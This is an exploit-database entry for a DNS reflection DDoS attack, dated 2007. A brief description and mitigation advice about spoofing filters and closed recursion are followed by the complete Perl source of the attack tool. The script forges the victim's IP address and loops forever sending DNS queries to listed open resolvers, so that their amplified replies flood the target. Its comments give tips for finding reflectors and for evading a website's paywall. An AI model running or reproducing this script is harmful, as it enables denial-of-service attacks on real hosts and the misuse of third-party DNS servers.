DNS Reflection DDoS Attack

vendor:

by:

Shadow

7.5

CVSS

HIGH

DNS Reflection Attack

693

CWE

Product Name:

Affected Version From:

Affected Version To:

Patch Exists:

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

This script is a Perl implementation of a DNS reflection DDoS attack. It uses Net::DNS::Resolver and Net::RawIP modules to send DNS packets to open, recursive DNS servers. The attack involves spoofing the source IP address to that of the target, so that the responses from the DNS servers are directed towards the target, causing a flood of traffic.

Mitigation:

To mitigate this vulnerability, network administrators should implement ingress and egress filtering to prevent spoofed IP addresses from entering or leaving their networks. Additionally, DNS servers should be properly configured to prevent open recursion.

Source

Exploit-DB raw data:

#!/usr/bin/perl
# Get Net::RawIP at http://search.cpan.org/CPAN/authors/id/S/SZ/SZABGAB/Net-RawIP-0.21_01.tar.gz
# cpan Net::DNS:Resolver seems to work fine on each machine I throw it on, as well.
# PS: To see if you can spoof, check out the ANA Spoofer project.
# http://spoofer.csail.mit.edu/
#
# Written by Shadow
# irc.dark-irc.net #thecorpz
# chemshadow@gmail.com

use Net::DNS::Resolver;
use Net::RawIP;
use strict;

# Populate this list with domain names with lots of A records. IRC server DNS pools are a good place to look.
# Maybe get a cheap throwaway domain and add your own A records.
my @name = ("irc.efnet.net", "irc.dal.net", "irc.undernet.org", "irc.freenode.net");
my $names = "3"; #number of entries in @name, minus one.

# Populate this list with ONLY open, recursive dns servers.
# http://www.dnsstuff.com/ - Block their cookies to use the site w/o paying.
my $nameservers;
my @nameservers = ("205.234.223.168", "64.202.117.121", "208.80.184.69", "200.255.59.150") #4 entries.

my $reflectors = "3"; # Number of entries in @nameservers, minus one.
my $debug = 1; # Change to 0 if you don't wanna have your console flooded.

##########################
# END USER CONFIGURATION #
##########################

my $str;
my $name;
my $src_ip;
my $reflector;
$src_ip = $ARGV[0];

if ($ARGV[0] eq '') { print "Usage: " . $0 . " <IP>\n"; exit(0); }
print ("Hitting $ARGV[0]\n");

for (my $i=0; $i < 256; $i++) {
    # Make DNS packet
    my $dnspacket = new Net::DNS::Packet($str, "A", "IN");
    my $dnsdata = $dnspacket->data;
    my $sock = new Net::RawIP({udp=>{}});
    # send packet
    $str = @name[int rand($names)];                            # Select entry from @name
    $reflector = $nameservers[int rand($reflectors)];          # Select entry from @nameservers
    $sock->set({ip => {
                saddr => $src_ip, daddr => "$reflector", frag_off=>0,tos=>0,id=>1565},
                udp => {source => 53,
                dest => 53, data=>$dnsdata
                } });
    $sock->send;
    if ($debug eq "1") { print "Me -> " . $reflector . "(DNSing " . $str . ")" . " -> " . $src_ip . " \n"; }
    $i = 0;
}
exit(0);

# milw0rm.com [2007-10-23]